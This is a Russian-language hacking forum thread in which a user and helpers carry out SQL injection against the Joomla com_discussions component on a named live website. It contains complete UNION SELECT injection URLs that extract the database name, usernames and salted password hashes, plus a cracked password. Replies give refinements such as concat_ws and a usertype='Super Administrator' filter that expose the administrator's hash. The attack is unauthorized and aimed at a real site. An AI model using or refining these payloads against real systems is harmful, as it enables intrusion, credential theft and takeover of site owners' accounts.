PDA

Просмотр полной версии : com_discussions Joomla


Cmexo3aBp
20.06.2012, 15:01
Вообщем мне требуется помощь. Я немого не допонимаю суть SQL инъекций видимо просто но все же опишу свою проблему и буду рад если кто поможет дельными советами.

Есть пациент:


index.php?option=com_discussions&view=thread&catid=14%3Aberserk&thread=1


НАм требуется узнать имя базы данных в которой лежат Логин и пароль администратора делаю это вот так:


index.php?option=com_discussions&view=thread&catid=14%3Aberserk&thread=1'%20union%20all%20select%20concat(0x7e,0x2 7,unhex(Hex(cast(database()%20as%20char))),0x27,0x 7e)--+a


Узнаю что название базы данных - ipenza_giperion

Далее вытаскиваем логин администратора следующим образом:


index.php?option=com_discussions&view=thread&catid=14%3Aberserk&thread=1'%20union%20all%20select%20(select%20conca t(0x7e,0x27,unhex(Hex(cast(jos_users.username%20as %20char))),0x27,0x7e)%20from%20`ipenza_giperion`.j os_users%20Order%20by%20username%20limit%200,1)%20--+a


Узнаю что он у нас оказывается: Trav

Далее вытаскиваем пасс ( он вроде как должен быть в хэше)


/index.php?option=com_discussions&view=thread&catid=14%3Aberserk&thread=1'%20union%20all%20select%20(select%20conca t(0x7e,0x27,unhex(Hex(cast(jos_users.password%20as %20char))),0x27,0x7e)%20from%20`ipenza_giperion`.j os_users%20Order%20by%20username%20limit%200,1)%20--+a#


Наш пароль зашифрован и выглядит вот так: 404d9cea50d28bf697fd5f49fcb12fee:fk2uJkr1H3qsZ4eIP IBYoQ2j4denG7nM

После долгих изучений как расшифровать пароли решил попробывать перебором в пассвордпро .... и о софтинка помогла и разгадала пароль...

Итак что имеем:

Логин Администратора: Trav

Пароль Администратора: 489341282

Заходим в http:///administrator/ вводим то что нашли ....ииииии как нистранно неподходит что то....

Вот где я ошибся ?

Mr.Snuffer
20.06.2012, 15:12
Вообщем мне требуется помощь. Я немого не допонимаю суть SQL инъекций видимо просто но все же опишу свою проблему и буду рад если кто поможет дельными советами.
Есть пациент:
НАм требуется узнать имя базы данных в которой лежат Логин и пароль администратора делаю это вот так:
Узнаю что название базы данных - ipenza_giperion
Далее вытаскиваем логин администратора следующим образом:
Узнаю что он у нас оказывается: Trav
Далее вытаскиваем пасс ( он вроде как должен быть в хэше)
Наш пароль зашифрован и выглядит вот так: 404d9cea50d28bf697fd5f49fcb12fee:fk2uJkr1H3qsZ4eIP IBYoQ2j4denG7nM
После долгих изучений как расшифровать пароли решил попробывать перебором в пассвордпро .... и о софтинка помогла и разгадала пароль...
Итак что имеем:
Логин Администратора: Trav
Пароль Администратора: 489341282
Заходим в http://giperion.pro/administrator/ вводим то что нашли ....ииииии как нистранно неподходит что то....
Вот где я ошибся ?



Где ты умудрился такой пасс раздекодить? oO

попугай
20.06.2012, 15:13
concat_ws(0x3a,username,password)

вместо отдельных jos_users.password и jos_users.username

Cmexo3aBp
20.06.2012, 15:14
http://gyazo.com/35835a929aaea293e4052bcc1c5b3b99.png?1340186457

Ну как то так получилось

Cmexo3aBp
20.06.2012, 15:20
concat_ws(0x3a,username,password)
вместо отдельных jos_users.password и jos_users.username



Огромное спасибо оказывается все чуть попроще можно сделать было. Но сути не поменяло это


option=com_discussions&view=thread&catid=14%3Aberserk&thread=1'%20union%20all%20select%20(select%20conca t_ws(0x3a,username,password)%20from%20`ipenza_gipe rion`.jos_users%20Order%20by%20username%20limit%20 0,1)%20--+a%200,1)%20--+a


Вот запрос который вы предложили.

Получил я на него следующее:

.Trav.:404d9cea50d28bf697fd5f49fcb12fee:fk2uJkr1H3 qsZ4eIPIBYoQ2j4denG7nM

Хэш тот же самый пароль следовательно такой же и все так же он не подходит в админку

Однако доступ на форум я получил. Следовательно я считаю что пароль и логин этот от учетной записи на форуме. Но в упор не понимаю как вытащить пароль и логин от админки.

Cmexo3aBp
20.06.2012, 15:26
admin:295cf2af1b061ba92e177c9142b5a158:0Nk1f1OCEPN vSCWl8c9JgQeZSO8Hygty:Super Administrator
Пояснение:
Админа жумлы мы выводим запросом: where usertype='Super Administrator'
а не первого попавшегося лимитом.


Тьфу блин..... Преблагодарен вам очень.

попугай
20.06.2012, 15:26
Огромное спасибо
оказывается все чуть попроще можно сделать было. Но сути не поменяло это
Вот запрос который вы предложили.
Получил я на него следующее:
.Trav.:404d9cea50d28bf697fd5f49fcb12fee:fk2uJkr1H3 qsZ4eIPIBYoQ2j4denG7nM
Хэш тот же самый пароль следовательно такой же и все так же он не подходит в админку



Значит это не админский акк. Так как ты упорядочил по username.

20Order%20by%20username

То, вначале тебе вывелся этот юзер с точкой в нике.

Убери упорядочение или выведи непосредственно админов. при помощи

where usertype like '%admin%'

Cmexo3aBp
20.06.2012, 15:36
http://gyazo.com/66217d4a031316f6ae037bed425ffd56

Вы апсолютно правы. Спасибо огромное за помощь. Подотру урл сайта дабы избежать конфликтов с владельцем.